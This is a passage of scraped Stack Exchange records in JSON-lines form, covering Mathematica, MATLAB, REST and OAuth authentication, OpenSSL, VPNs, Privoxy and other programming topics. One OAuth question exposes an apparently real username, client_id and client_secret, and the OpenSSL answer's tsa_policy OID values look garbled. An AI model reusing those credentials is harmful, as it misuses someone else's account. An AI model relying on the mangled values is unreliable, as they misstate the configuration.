To put it more explicitly, I have a PDE\n$$F\\left(u(x,t),u_{xx}(x,t),u_t(x,t),x,h,w\\right)=0$$\nsubject to a couple boundary conditions.\nI am trying to plot the locus of points $(h,w,t)$ such that\n$$u(x_0,t;h,w)=u_0.$$\nHere's what I tried, using <code>ParametricNDSolve<\/code> and <code>ContourPlot3D<\/code>:\n<code>sol = ParametricNDSolve[{D[u[x, t], t] \n==(1 - h*UnitBox[(x - 6)\/w])*u[x, t]*(1 - u[x, t]) + D[u[x, t], {x, 2}],\nu[x, 0] == UnitBox[x],u[40, t] == u[-40, t] == 0}, u, \n{x, -40, 40}, {t, 0, 20}, {h, w}];\n\nContourPlot3D[u[h, w][20, t] \/. sol == 0.9, {h, 0.1, 0.9}, {w, 0.5, 10}, {t, 0, 20}]\n<\/code>\nUnfortunately, this results in a series of errors about \"[some long expression involving $u$] is neither a list of replacement rules nor a valid dispatch table and so cannot be used for replacing.\"\nWhat have I done wrong here?\nAnswer: You have another problem but this is more a calculation problem so i will not say much about it. Your problem can be solved by just substituting the function beforehand:\n<code>sol = u \/. \n ParametricNDSolve[{D[u[x, t], \n t] == (1 - h*UnitBox[(x - 6)\/w])*u[x, t]*(1 - u[x, t]) + \n D[u[x, t], {x, 2}], u[x, 0] == UnitBox[x], \n u[40, t] == u[-40, t] == 0}, u, {x, -40, 40}, {t, 0, 20}, {h, w}]\n<\/code>\nAnd you're done.\nYou can call this simply by:\n<code>ContourPlot3D[sol[h, w][20, t], {h, 0.1, 0.9}, {w, 0.5, 10}, {t, 0, 20}]\n<\/code>\nBut now you will notice, that mathematica want unbelievable many points to solve your PDE.\nI mean, we can see why. You have a really big Range of values. So i'd consider to descrease your precision\/accuracy or something. Or Increase your MaxPoints to get the full power (which will need a loooong time to plot).\n","meta":{"source":"mathematica.stackexchange","title":"Contour plot for ParametricNDSolve","dup_signals":{}},"subset":"stackexchange"} +{"text":"Securing passwords for REST Authentication\n\nQuestion: I'm developing a REST application using the Spring Framework, as as part of the requirements, we have to secure the different functions of the system to different user roles (pretty standard stuff). My current method of determining the roles for the currently logged in user is that every time they call a REST url from the frontend, I am adding a Base 64 encoded string to the request header. This string when decoded resolves to their username and a bCrypt generated password hash in this format username:hashedpassword.\nI'm slightly concerned that this is not secure, even though the request will be made over a secure HTTP connection, because it could give a potential hacker access to at least the users username. They couldn't get the password because that is just a hashed value, but they could use that hashed value to call the REST API successfully. \nHow can I secure this system properly? Do I need to add in a session token or some kind of randomly generated key for the session? \nMy followup question is then how can I do that RESTfully? I was thinking that I could generate (using bCrypt) a hash that represented the username:hashedpassword together on login, save that to the database and check against that whenever a REST call is made. When the user logs out, just set that to null. Rinse and Repeat. That way any potential attacker would only get a single bCrypt string that wouldn't expose the username, but they could still use that string to call the REST API.\nComment: Please see http:\/\/stackoverflow.com\/questions\/3461298\/password-hashing-non-ssl \n\nand\n\nhttp:\/\/security.stackexchange.com\/questions\/53952\/rest-security-standards\/53973\n\nand\n\nhttp:\/\/security.stackexchange.com\/questions\/7057\/i-just-send-username-and-password-over-https-is-this-ok\nComment: If you want to add an answer containing a link to that last post, I'll mark it as correct, that's exactly what I was looking for! Thanks so much!\nComment: why are you reinventing the wheel? It's not like you're the first person ever to use REST. There are several well-established **and extensively tested** methods for REST authentication.\nAnswer: The following links may provide you with an in-depth answer:\n\nREST security standards\nI just send username and password over https. Is this ok?\nhttps:\/\/stackoverflow.com\/questions\/3461298\/password-hashing-non-ssl\n\nPlease keep in mind that it is better to not use the username-password combination in every request that you make. Better is to authenticate the user, generate a token server-side, communicate it to the client (e.g. in a cookie) and use that token as authentication for subsequent requests. This link can guide you in that process: https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Session_Management_Cheat_Sheet.md. \nAnswer: If you only need to provide authentication but the data transmitted over the wire is not sensitive then there is a better way without the overhead\/latency of SSL.\nSay you have a mobile client app; first make the user sign up or register by providing their email(username) and password in a separate web form (not part of the app or REST service). Then upon successful registration you respond with a user key (this can be a shared secret key stored in the user account on the server (database) for symmetric encryption or a public key for asymmetric encryption where the corresponding private key is stored in the user account on the server (database). This is all done using a web form over SSL.\nNow when the user opens the client app you must ask them for their credentials which will be sent with every request to the RESTful service. They must provide their name, password and encryption key which they received previously. This need only be done once. The app then provides some http header with each request which looks something like this:\nAUTHENTICATE> username:timestamp:encrypted{password:timestamp} \/AUTHENTICATE>\nNote that both the password and timestamp inside the {} is encrypted using the user's key. The timestamp is updated with every single request.\nImplement an authentication filter on the server that does the following:\nFirst check the timestamp and if expired (say older than 1 second) send an UNAUTHORIZED HTTP response code. If the timestamp is valid lookup the username in your user account database. If not found send an UNAUTHORIZED HTTP response. If the username is found, fetch the stored encryption key for that user (remember this can be a shared secret key or the private key for the users public key). Decrypt the encrypted {password:timestamp}. The decryted password must match the users password stored in your database (the password itself could also be encryted in the database using another key for added security) and the decrypted timestamp must also match the non encrypted timestamp sent in the AUTHENTICATE header above. If not then send an UNAUTHORIZED HTTP response code. If successful the request has been authenticated without the use of cookies\/sessions.\nYou can also cache the the user details to avoid doing a database lookup with every request.\nNow if someone is snooping and intercepts the request they will not be able to re-use it to gain access because either the timestamp will be invalid or ,if they update the unencrypted timestamp to be valid, it will not match the encrypted timestamp (after the authentication filter decrypts it).\nAnother advantage of this approach over using a single app key is that you now have complete control over who can access your service by putting an expiry date on the user account in the database (effectively implementing a subscription based service). This is great because at first you may want to get as many users as possible with a trial subscription (free for say 1 year) then later block access to that user if they haven't payed up to extend the account expiry date :)\n","meta":{"source":"security.stackexchange","title":"Securing passwords for REST Authentication","dup_signals":{}},"subset":"stackexchange"} +{"text":"Path to JQuery library in \n\nQuestion: I downloaded jquery library and added it to WebContent\/js folder in Spring MVC project. In my jsp file i have a line\n but when i try to use jquery functions, it doesnt work. When i replace source path to \"http:\/\/code.jquery.com\/jquery-latest.js\" it works fine. Jsp files are located in \"WebContent\/WEB-INF\/jsp\" folder. What is the correct path to jquery library? \nComment: So you have a bad path to that folder. what is the question?!\nAnswer: Check out this answer. Basically you need to use the <code><c:url \/><\/code> tag to generate the correct relative path to your script.\nIn your case, you'll want to use:\n<code><script src=\"<c:url value='\/js\/jquery.js' \/>\"><\/script>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Path to JQuery library in","dup_signals":{}},"subset":"stackexchange"} +{"text":"Are there any strange things with google.com over HTTPS?\n\nQuestion: So I'm always browsing the web through Privoxy using minimum these rules: \n<code>vi \/etc\/privoxy\/user.action\n\n{ +redirect{s@http:\/\/@https:\/\/@} }\n.chrome.google.com\n.code.google.com\n.docs.google.com\n.encrypted.google.com\n.googlecode.com\n.googlelabs.com\n.mail.google.com\n\n# google calendar\n{ +redirect{s@http:\/\/www.google.com\/calendar\/@https:\/\/www.google.com\/calendar\/@} }\n.google.com\n\n# google notebook\n{ +redirect{s@http:\/\/www.google.com\/notebook\/@https:\/\/www.google.com\/notebook\/@} }\n.google.com\n<\/code>\nThis is working great, in short it ensures that if I visit e.x.: a Google Notebook page, it's always using encryption. So if I forget to type \"HTTPS\" and I type \"HTTP\" to a Google notebook URL it redirects me to the HTTPS version of Google Notebook.\nBut... a strange thing happened a few weeks ago several times: when I used the Privoxy I just couldn't reach Gmail.com, or Google Notebook, etc. If I configured Firefox to not use Privoxy I could reach Google Notebook pages, or Gmail, etc.\nThe error message when I used Privoxy was [from the webbrowser]: \"connection timed out\". [I tried to restart Privoxy, restart the machine, and I tried it on other machines with different OS, at different places\/ISP's]\nso the Q: Could that be that I was attacked or there were any problems with Google Notebook, Gmail over CLEANLY* HTTPS?\n*CLEANLY means that CLEANLY over HTTPS [redirecting all http:\/\/mail.google.com requests to .\nI'm using Privoxy because it could defend me from sslsniff like attacks [FIXME] -> so that HTTPS connections could get degraded to HTTP.\nAnswer: I don't think this is the appropriate forum to ask for help debugging your privoxy rules; asking on the privoxy mailing lists might get you better answers. That said, I do have some advice for you:\nMy recommendation: I believe that there's a better way to achieve your goals. Instead of trying to write your own custom Privoxy rules, I recommend that you use HTTPS Everywhere.\nBy way of background, HTTPS Everywhere is a browser extension for Firefox. Whenever you visit a web site that supports HTTPS (and that HTTPS Everywhere is familiar with), the extension will redirect you to use the HTTPS version of the web site. Others have built up an extensive database that HTTPS Everywhere uses to get you HTTPS protection whereever possible, without breaking your web browsing experience.\nWhy use HTTPS Everywhere? Let me justify my recommendation of HTTPS Everywhere:\n\nAs a reminder, earlier this year you asked about using privoxy for these purposes, and I warned that the privoxy approach may be fragile and it would be better to use HTTPS Everywhere, if possible. The reason is that HTTPS Everywhere is well-tested and designed for exactly this purpose, and incorporates a whitelist that understands when it is safe to perform the HTTP->HTTPS conversion, and reflects the idiosyncracies of various sites. If you want to write your own Privoxy rules, then you will have to duplicate all that research on your own, and you should not be surprised if things frequently break for you. \nIf that doesn't convince you, I'll also remind you that earlier this year you asked about why your privoxy approach broke downloading Firefox add-ons, and people here gave you a nice explanation of why your privoxy rules weren't quite right and recommended using HTTPS Everywhere instead. If you continue using Privoxy rules, I think you should be prepared that web sites may occasionally break for mysterious and tricky-to-debug reasons.\nAnswer: \nCould that be that I was attacked or there were any problems with Google Notebook, Gmail over CLEANLY* HTTPS?\n\nI don't think you've been attacked using \"sslsniff\" alike approaches. If, you would most probably haven't noticed it.\nThe \"connection timed out\" give a pretty good indication that there was either a slow network or a general network problem.\nI am not aware about problems at the Google services you noted, but you have to remember that you don't just dial-in to Google itself... your connection hops several network connections. This means that it only takes one of the servers along the way to be out-of-order for a short time and you'll notice \"connection timed out\" messages. \nBesides, such a message can point to attacks, but most of the time they don't.\n\nI'm using Privoxy because it could defend me from sslsniff like attacks [FIXME] -> so that HTTPS connections could get degraded to HTTP.\n\nYou forgot about the fact that \"sslsniff\" uses MITM-alike (Man In The Middle) attacks, which works in a way that neither endpoint of the connection actually notices that the connection is degraded.\nSince Privocy (being nothing more than a filtering proxy) runs on your local machine, it will only get the same information your machine generally gets... Privoxy has no way of detecting if the connection has been tampered with in most cases of \"sslsniff attacks, since you - being one of the two endpoints - receive information that makes your computer thing the connection is still a secure HTTPS connection.\nThat is - what makes \"sslsniff\" such an often-discussed toolset. It shows that there are security problems that HTTPS actually shouldn't have.\nmy opinion\nAll in all, I think you've created a nice set of rules for Privoxy which help you to surf as you like. But I also think you are expecting a bit too much security from a non-caching filtering proxy you're running on your local machine.\nPrivoxy was never build to be a security tool to protect and secure HTTPS connections. Privoxy was and still is a filtering proxy which was initially made to filtered stuff like advertising... not something that will make sure your https connection is secure. \nAs a reminder, here's the description from the privoxy website itself:\n\nPrivoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. \n\nMy 2 cents: you can't expect such a tool to do a job it was never build for. Remember: we're talking network security here, not advertising banners and killing links to malware and phishing websites! \nUPDATE\nIn fact, when talking about \"sslsniff\" or even \"sslstrip\" (which won't cause ssl errors when in effect), it's known that even tools like \"HTTPS Everywhere\" fail. \nI saw someone answered that \"HTTPS Everywhere\" would be the perfect choice. And yes, it is indeed a \"better choice than Privoxy\". Note though that even \"HTTPS Everywhere\" won't protect you from every kind of HTTPS attack. \nFor details on \"sslsniff\", \"sslstrip\" and the \"HTTPS Everywhere\" limitations related to it, you might want to check Does HTTPS Everywhere defend me against sslsniff-like attacks? \nBut \"HTTPS Everywhere\" is definitely a better choice than relying on Privoxy.\n","meta":{"source":"security.stackexchange","title":"Are there any strange things with google.com over HTTPS?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Criminals using my IP when I use a VPN\n\nQuestion: Is it possible for my IP address to be used by other parties when I use a VPN? My friend says that someone who is computer smart can use it for illegal activities, so it\u00b4s traced back to me.\nComment: Please specify whether you're talking about VPN *services*, offered for free or for charge by various organizations, or VPN *tunnels*, which are the underlying mechanism by which they work and may be public, leased, or private.\nAnswer: Even when you use a \"VPN done right\" which makes all activity originate from the external IP of the VPN provider, you might still trigger a false positive and get wrongly accused for what another VPN user did.\n\nVPN User A has an account on example.com. A is a perfect model citizen of the example.com community.\nThen VPN User B also creates an account on example.com, and proceeds to break every written and unwritten rule of the website.\nThe admin of example.com intervenes. They check the IP of User B and see that A and B both have the same IP address. They therefor believe that A and B are the same person and both accounts get banned.\n\nWhen the admin of the website notices that the IP is a VPN exit point and they are reasonable, they might revoke the ban for A. But they might not notice that unless contacted. That appeal process will still be inconvenient for A.\nI've also seen websites which experienced increased abuse over VPNs and overreacted by assuming that nobody would use a VPN unless they have nefarious intentions (after all, if you have nothing to hide...) and decided to proactively ban all users who use VPNs.\nComment: Great answer! One question comes to mind though: how can you tell whether or not a person is connected through a VPN? Do websites maintain a list of known IP addresses for VPN providers? How would they keep that list updated?\nComment: @Vinayak not only are such lists maintained by various groups (most charge for an aggregation like service), it's not overly difficult for some site admins to _home brew_ their own via [`dig`](https:\/\/www.cyberciti.biz\/faq\/linux-unix-dig-command-examples-usage-syntax\/) and [`whois`\/`host`](https:\/\/www.cyberciti.biz\/faq\/linux-unix-command-to-find-who-owns-domainname\/) command line tools. Though _difficulty_ being somewhat relative, and specific tools may vary; _`dig`-n-such_ just being some that are easily installed, and only part of a larger intrusion monitoring\/prevention system.\nAnswer: If the whole VPN thing is done right, then there is no such risk for you. \nHowever, there are \"community powered\" VPN providers that route other peoples traffic through your system, and one example is Hola:\n\nHola built a peer-to-peer overlay network for HTTP, which securely routes the sites you choose through other Hola users' devices and not through expensive servers.\n\nYou don't want to use a service that uses your bandwidth and potentially gets you in trouble. \nBottomline: If you want a VPN, pay for it. There is no such thing as free bandwidth.\nComment: by definition of done right I assume you mean that you don't share the VPN with others?\nComment: @silverpenguin I would consider setting up your own VPN server \"done right\".\nComment: As described, Hola sounds a lot like [Tor](https:\/\/en.wikipedia.org\/wiki\/Tor_(anonymity_network)).\n","meta":{"source":"security.stackexchange","title":"Criminals using my IP when I use a VPN","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sync Contacts From Azure AD or MS O365 to phone book\n\nQuestion: Every user account has such information as username, email, phone number. I can find these information via AzureAD, MS O365, Exchange Online, MS Teams etc.\nIs there any possible way to sync these information with users' contact\/phone books on their mobile devices?\nSo in the result every employee should see all his co-workers in his phonebook.\nAnswer: If users add the organizational mail account (Office 365) on their phone they can simply search for their co-workers. Initial search results will be as found on the phone. After that they will see results from the organizational directory address book.\nIf you need your users to have the information available as local contacts on their phones, you can instruct your users to follow the guidance at https:\/\/support.microsoft.com\/en-us\/office\/outlook-for-ios-and-android-faq-65a01e26-e3c2-4067-bd05-0db6220e5c34 in section \"How do I save my Outlook contacts to the default Contacts app on iOS and Android?\".\nComment: I found that i can sync all contacts from Outlook app to the phone-book the only issue is, Is there any easy and fast way to add all users into contacts folder?\n","meta":{"source":"stackoverflow","title":"Sync Contacts From Azure AD or MS O365 to phone book","dup_signals":{}},"subset":"stackexchange"} +{"text":"Spring-Data\/MongoDB\/QueryDSL Searching nested _id of ObjectId type\n\nQuestion: When an document from a collection is nested inside a document of another collection, it's pretty standard to make a copy of the nested document verbatim instead of creating another type of document just for the sake of nesting. Ex:\n<code>category {\"_id\": ObjectId(\"c1\"), \"name\": \"Category 1\"}\nquestion {\"_id\": ObjectId(\"q1\"), category: {\"_id\": ObjectId(\"c1\"), \"name\": \"Category 1\"}}\n<\/code>\nWhen using queryDSL as follows:\n<code>question.category.id = \"c1\"\n<\/code>\nqueryDSL generates a query like this:\n<code>\"question.category._id\":\"c1\"\n<\/code>\nwhere I expect:\n<code>\"question.category._id\":ObjectId(\"c1\")\n<\/code>\nThis works for top level documents, not for nested. I think this is a valid case and Spring should do the same translations it does for top level search. Is there a workaround for that?\nAnswer: QueryDSL will not convert String to ObjecetId on the fly since it is not aware of Spring Data annotations like <code>@Id<\/code> or <code>@Field(targetType = FieldType.OBJECT_ID)<\/code>. Therefore, it will look only at Java type of your field. I found this workaround to keep String Id but been able to compare with ObjectId. Taking your code as a reference I can give you this snippet:\n<code>Path<ObjectId> categoryIdPath = Expressions\n .path(ObjectId.class, qQuestion.category.id.getMetadata());\n\nPredicate predicate = Expressions.predicate(Ops.EQ, categoryIdPath,\n Expressions.constant(new ObjectId(\"c1\"))));\n<\/code>\n","meta":{"source":"stackoverflow","title":"Spring-Data\/MongoDB\/QueryDSL Searching nested _id of ObjectId type","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to graph error in parameters from polynomial fit - MATLAB\n\nQuestion: I have a list of data that I am trying to fit to a polynomial and I am trying to plot the 95% confidence bands for the parameters as well (in Matlab).\nIf my data are x and y\n<code>f=fit(x,y,'poly2')\nplot(f,x,y)\nci=confint(f,0.95);\na_ci=ci(1,:);\nb_ci=ci(2,:);\n<\/code>\nI do not know how to proceed after that to get the minimum and maximum band around my data. Does anyone know how to do that? \nAnswer: I can see that you have the curve fitting toolbox installed, which is good, because you need it for the following code to work.\nBasic fit of example data\nLet's define some example data and a possible fit function. (I could also have used <code>poly2<\/code> here, but I wanted to keep it a bit more general.)\n<code>xdata = (0:0.1:1)'; % column vector!\nnoise = 0.1*randn(size(xdata));\nydata = xdata.^2 + noise;\nf = fittype('a*x.^2 + b'); \nfit1 = fit(xdata, ydata, f, 'StartPoint', [1,1])\nplot(fit1, xdata, ydata)\n<\/code>\nSide note: <code>plot()<\/code> is not our usual plot function, but a method of the cfit-object fit1.\n\nConfidence intervals of the fitted parameters\nOur fit uses the data to determine the coefficients <code>a<\/code>,<code>b<\/code> of the underlying model <code>f(x)=ax2+b<\/code>. You already did this, but for completeness here is how you can read out the uncertainty of the coefficients for any confidence interval. The coefficients are alphabetically ordered, which is why I can use <code>ci(1,:)<\/code> for <code>a<\/code>, and so on.\n<code>names = coeffnames(fit1) % check the coefficient order!\nci = confint(fit1, 0.95); % 2 sigma interval\na_ci = ci(1,:)\nb_ci = ci(2,:)\n<\/code>\nBy default, Matlab uses 2\u03c3 (0.95) confidence intervals. Some people (physicists) prefer to quote the 1\u03c3 (0.68) intervals.\nConfidence and Prediction Bands\nIt's a good habit to plot confidence bands or prediction bands around the data \u2013 especially when the coefficients are correlated! But you should take a moment to think about which one of the two you want to plot:\n\nPrediction band: If I take a new measurement value, where would I expect it to lie? In Matlab terms, this is called the \"observation band\".\nConfidence band: Where do I expect the true value to lie? In Matlab terms, this is called the \"functional band\".\n\nAs with the coefficient's confidence intervals, Matlab uses 2\u03c3 bands by default, and the physicists among us switch this to 1\u03c3 intervals. By its nature, the prediction band is bigger, because it is the combination of the error of the model (the confidence band!) and the error of the measurement.\nThere is a another destinction to make, one that I don't fully understand. Both Matlab and Wikipedia make that distinction.\n\nPointwise: How big is the prediction\/confidence band for a single measurement\/true value? In virtually all cases I can think of, this is what you would want to ask as a physicist.\nSimultaneous: How big do you have to make the prediction\/confidence band if you want a set of all new measurements\/all prediction points to lie within the band with a given confidence?\n\nIn my personal opinion, the \"simultaneous band\" is not a band! For a measurement with n points, it should be n individual error bars!\nThe prediction\/confidence distinction and the pointwise\/simultaneous distinction give you a total of four options for \"the\" band around the plot. Matlab makes the 2\u03c3 pointwise prediction band easily accessible, but what you seem to be interested in is the 2\u03c3 pointwise confidence band. It is a bit more cumbersome to plot, because you have to specify dummy data over which to evaluate the prediction band:\n<code>x_dummy = linspace(min(xdata), max(xdata), 100);\nfigure(1); clf(1);\nhold all\nplot(xdata,ydata,'.')\nplot(fit1) % by default, evaluates the fit over the currnet XLim\n% use \"functional\" (confidence!) band; use \"simultaneous\"=off\nconf1 = predint(fit1,x_dummy,0.95,'functional','off');\nplot(x_dummy, conf1, 'r--')\nhold off\n<\/code>\n\nNote that the confidence band at <code>x=0<\/code> equals the confidence interval of the fit-coefficient <code>b<\/code>!\nExtrapolation\nIf you want to extrapolate to x-values that are not covered by the range of your data, you can evaluate the fit and the prediction\/confidence band for a bigger range:\n<code>x_range = [0, 2];\nx_dummy = linspace(x_range(1), x_range(2), 100);\nfigure(1); clf(1);\nhold all\nplot(xdata,ydata,'.')\nxlim(x_range)\nplot(fit1)\nconf1 = predint(fit1,x_dummy,0.68,'functional','off');\nplot(x_dummy, conf1, 'r--')\nhold off\n<\/code>\n","meta":{"source":"stackoverflow","title":"how to graph error in parameters from polynomial fit - MATLAB","dup_signals":{}},"subset":"stackexchange"} +{"text":"When has the Tory party split over trade issues?\n\nQuestion: Today in a leaked UK Government memo it says the UK Tory Party has split 4 times in last 200 years over global trade. When were these 4 splits and over what?\nHere is the Reuters link to the memo itself.\nI can definitely think of one split over trade, the Corn Laws. I was wondering what the other 3 were. I suppose today's Tory party is split over the EU so that must be a second. Anyone else got the other two?\nAnswer: One case in point is the Tariff Reform League of Joe Chamberlain:\n\nTariff Reform split the MPs of the Conservative Party and their\n government coalition allies in the Liberal Unionist Party and was the\n major factor in its landslide defeat in 1906 to the Liberals who\n advocated Free Trade.\n","meta":{"source":"history.stackexchange","title":"When has the Tory party split over trade issues?","dup_signals":{}},"subset":"stackexchange"} +{"text":"JQuery, cytoscape.js - How to queue two different loops containing cytoscape animations?\n\nQuestion: I would like to execute one loop (1.), wait until animations from that loop end, then execute second loop with animations (2.). Can somebody tell me how to do it in an optimal way in this particular case?\n<code>cy.on(\"tap\", \".story_node\", function () {\n var node = this;\n\n var crudObjects = [\n {\n node: { group: \"nodes\", data: { id: \"edit\", content: \"Edytuj\" }, position: { x: node.position(\"x\"), y: node.position(\"y\") }, classes: \"crud\" },\n edge: { group: \"edges\", data: { source: node.id(), target: \"edit\" }, classes: \"crud_edge\" },\n targetPos: { x: node.position(\"x\") + 150, y: node.position(\"y\") - 75 }\n },\n {\n node: { group: \"nodes\", data: { id: \"create\", content: \"Dodaj\" }, position: { x: node.position(\"x\"), y: node.position(\"y\") }, classes: \"crud\" },\n edge: { group: \"edges\", data: { source: node.id(), target: \"create\" }, classes: \"crud_edge\" },\n targetPos: { x: node.position(\"x\") + 200, y: node.position(\"y\") }\n },\n {\n node: { group: \"nodes\", data: { id: \"delete\", content: \"Usu\u0144\" }, position: { x: node.position(\"x\"), y: node.position(\"y\") }, classes: \"crud\" },\n edge: { group: \"edges\", data: { source: node.id(), target: \"delete\" }, classes: \"crud_edge\" },\n targetPos: { x: node.position(\"x\") + 150, y: node.position(\"y\") + 75 }\n }\n ];\n\n \/\/ (1.)\n var areCrudNodesAdded = cy.$(\".crud\").length > 0;\n var source = cy.$(\".crud\").predecessors().sources().first();\n var delay = 0;\n var duration = 250;\n if (areCrudNodesAdded) {\n var crudNodes = cy.$(\".crud\");\n for (var i = 0; i < crudNodes.length; i++) {\n var currNode = crudNodes[i];\n (function (currNode) {\n currNode.delay(delay).animate({\n position: source.position(),\n css: {\n \"width\": 10,\n \"height\": 10,\n \"border-width\": 0,\n \"opacity\": 0\n }\n }, {\n duration: duration,\n complete: function () {\n currNode.remove();\n }\n });\n\n delay += duration;\n })(currNode);\n }\n }\n\n \/\/ (2.)\n if (!areCrudNodesAdded || source !== this) {\n source = this;\n $.each(crudObjects, function (idx, crud) {\n var crudNode = cy.add(crud.node);\n cy.add(crud.edge);\n\n crudNode.css({\n \"width\": 10,\n \"height\": 10,\n \"border-width\": 0,\n \"opacity\": 0\n }).delay(delay).animate({\n position: crud.targetPos,\n css: {\n \"width\": 80,\n \"height\": 80,\n \"border-width\": 2,\n \"opacity\": 1\n }\n }, {\n duration: duration,\n complete: function () {\n crudNode.removeCss();\n }\n });\n\n delay += duration;\n });\n }\n}); \/\/ on tap\n<\/code>\nAnswer: Create animations via <code>cy.animation()<\/code> and <code>ele.animation()<\/code>.\n<code>ele.animation().promise()<\/code> gives a promise that you can use for chaining.\n","meta":{"source":"stackoverflow","title":"JQuery, cytoscape.js - How to queue two different loops containing cytoscape animations?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to reuse access Token for Get method? I want to make a call to a extended URL to receive data\n\nQuestion: I have the following code which gives me a Access token, now that I have finally been able to access a token I realized this token will expire, so what can I do to keep refreshing the token, and use it to grab vaules in my get method\nPostman Image (the data I want) : \nValuesController.Cs \n<code>namespace APICredential.Controllers\n{\n [RoutePrefix(\"api\")]\n public class ValuesController : ApiController\n {\n [HttpGet, Route(\"values\")]\n public async Task<string> Post()\n {\n using (HttpClient client = new HttpClient())\n {\n client.BaseAddress = new Uri(\"https:\/\/api.elliemae.com\/oauth2\/\");\n\n var parameters = new Dictionary<string, string>()\n {\n {\"grant_type\", \"password\"}, \/\/Gran_type Identified here\n {\"username\", \"admin@encompass:BE11200822\"},\n {\"password\", \"Shm******\"},\n {\"client_id\", \"gpq4sdh\"},\n {\"client_secret\", \"dcZ42Ps0lyU0XRgpDyg0yXxxXVm9@A5Z4ICK3NUN&DgzR7G2tCOW6VC#HVoZPBwU\"},\n {\"scope\", \"lp\"}\n };\n\n HttpRequestMessage request = new HttpRequestMessage(HttpMethod.Post, \"v1\/token\")\n\n {\n Content = new FormUrlEncodedContent(parameters)\n };\n\n HttpResponseMessage response = await client.SendAsync(request);\n\n string result = await response.Content.ReadAsStringAsync();\n\n return result;\n }\n }\n\n[HttpGet, Route(\"values\/{id}\")]\npublic string Get(int id)\n{\n return \"\";\n\n}\n<\/code>\nComment: accesstoken is already in place that's giving people the visual to let them know where I am currently\nComment: if your token expired...... just get a new one (like you just got the first one), you can increase the expiration time if that helps\nComment: Well how do I use this access token on a GET method, I want to extend a retrieve data through my access token\nComment: Your question doesn't fit will with the code you've shown so it's hard to answer. Maybe this info would help you make your question more clear. https:\/\/learn.microsoft.com\/en-us\/aspnet\/web-api\/overview\/security\/external-authentication-services\nAnswer: Refresh token functionality is not implemented in the API (https:\/\/api.elliemae.com\/oauth2\/v1\/token).\nif had supported, you would get the refresh_token along access_token, by using refresh_token you could update your access_token after its expiry. This is what OAuth 2.0 says.\n","meta":{"source":"stackoverflow","title":"How to reuse access Token for Get method? I want to make a call to a extended URL to receive data","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error while creating a CSR\n\nQuestion: During the creation of self-signed certificate using OpenSSL command line tool, i'm encountered with an error \nFirst I created a private key\n<code>openssl genrsa -out MyKey1.key 2048<\/code>\nWhile creating a CSR i'm getting an error\n<code>openssl req -new -out MyCert1.req -key MyKey1.key -subj \/CN=Description of the Server<\/code>\nError is\n<code>problem creating object tsa-policy1=18.104.22.168.1<\/code>\n<code>5364:error:08064066:object identifier routines:OBJ_create:pid exists:crypto\\objects\\obj_dat.c:689:<\/code>\nIs there something i'm missing here ?\nComment: What version do you use? The error is interesting since it does not have much to do with ts module. Seems like it read the value from `openssl.cnf` but I don't see why. By the way, dont you miss quotation marks here: `-subj \"\/CN=Description of the Server\"`?\nComment: The Version is 1.0.1 Lite. I did have the quotation, missed it while adding it here.\nAnswer: \nClose the current cmd window and open new cmd window.\nContinue from the second \"req\" step.\nComment: worked for me. I think this is a big bug which should be solved by the developing team.\nAnswer: I had this same problem while creating a self signed certificate...\nsetting these two environment variables fixed it!\n<code>set RANDFILE=c:\\demo\\.rnd\nset OPENSSL_CONF=C:\\OpenSSL-Win32\\bin\\openssl.cfg\n<\/code>\nI found the solution in this blog post\nAnswer: I had the same issue when creating client certificate request on Windows platform. Run application as Administrator solves the problem.\nAnswer: In my situation, I changed the administrator password while I was working so CMD lost the privileges. I closed the current CMD window and opened again\nComment: Welcome to Stack Overflow and thank you for your attempted answer. However, it should be noted that your answer is pretty much a duplicate of the top voted answer. The *reason* why yours failed may be different (which could warrant a *comment* when you have enough rep), but the step you took to resolve it is exactly the same as noted in the top-voted-answer.\nAnswer: Look into the openssl.cnf file for this section:\n<code># Policies used by the TSA examples.\n\ntsa_policy1 = 188.8.131.52.1\ntsa_policy2 = 184.108.40.206.5.6\ntsa_policy3 = 22.214.171.124.5.7\n<\/code>\nComment or remove the tsa_policyX lines, save the configuration file and launch the command again.\n","meta":{"source":"stackoverflow","title":"Error while creating a CSR","dup_signals":{}},"subset":"stackexchange"} +{"text":"scanning files into nested structures\n\nQuestion: So I have tried looking for something similar to my situation but I cant find anything that helps or that is simple enough for me to understand. \nMy issue I am sure is not difficult, but I do not know how to do the following:\nI have a structure within a structure and need to scan in multiple files into the main structure.\nThis is what I have and the point where I am stuck is in messages. I feel as though I may need one more structure, but again I am not sure \nthese are my structures\n<code> typedef struct {\nint year;\nint month;\nint day;\nchar time[9];\n } datetime_t\n\n typedef struct\n {\ndatetime_t datetime;\ndouble latitude;\ndouble longitude;\ndouble magnitude;\ndouble depth;\nchar location[LOCATION]\n } data_t\n<\/code>\nhere is my scanning file\n<code> void scan_data(data_t Alaska[], data_t Central[],data_t Inner[],\n data_t East[],data_t West[],data_t Canada[MAX_INFO])\n {\nint i=0; \nFILE *FAlaska;\nFILE *FCentral;\nFILE *FInner;\nFILE *FEast;\nFILE *FWest;\nFILE *FCanada;\n\nFAlaska = fopen(\"Alaska.txt\", \"r\");\nFCentral = fopen(\"Central.txt\", \"r\");\nFInner = fopen(\"InnerMountain.txt\", \"r\");\nFEast = fopen(\"NorthEast.txt\", \"r\");\nFWest = fopen(\"NorthWest.txt\", \"r\");\nFCanada = fopen(\"NorthernCanada.txt\", \"r\");\n\nwhile (i < MAX_DATA && \n fscanf(FAlaska, \"%s\", data[i].datetime) !=EOF) \/*here is my issue*\/\n{ \n fscanf(FAlaska, \"d\", data.latitude);\n}\nfclose(FAlaska);\nreturn;\n }\n<\/code>\nI am not sure how or if I can scan data into a structure within a structure?\nDo you do data[I].datetime.year?\nor scan into datetime as a separate array\/struct and then assign it later to the bigger struct?\nany help would be much appreciated on how to do this. Thank You. \nComment: You ask [`fscanf`](http:\/\/en.cppreference.com\/w\/c\/io\/fscanf) to read a string, and write it to a structure, you can't do that. First of all, when `scanf` (and family) reads a string it reads a *space delimited* string, so if the string you want to read contains spaces it will not read all. Secondly, you need to read each field of the nested structure separately, if it's in the file that 